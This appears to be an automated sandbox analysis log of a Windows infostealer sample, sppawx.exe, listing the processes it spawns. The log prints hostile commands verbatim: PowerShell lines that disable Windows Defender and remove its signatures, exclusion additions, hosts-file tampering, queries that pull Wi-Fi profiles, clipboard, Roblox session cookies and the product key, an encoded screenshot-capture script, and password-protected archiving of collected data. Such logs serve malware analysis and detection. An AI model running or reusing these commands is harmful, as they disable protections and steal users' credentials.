Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\sppawx.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior

Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Users\user\Desktop\sppawx.exe "C:\Users\user\Desktop\sppawx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA7D9.tmp" "c:\Users\user\AppData\Local\Temp\vebzhwcp\CSCD4517BE1E6C4428293E27562A6116680.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
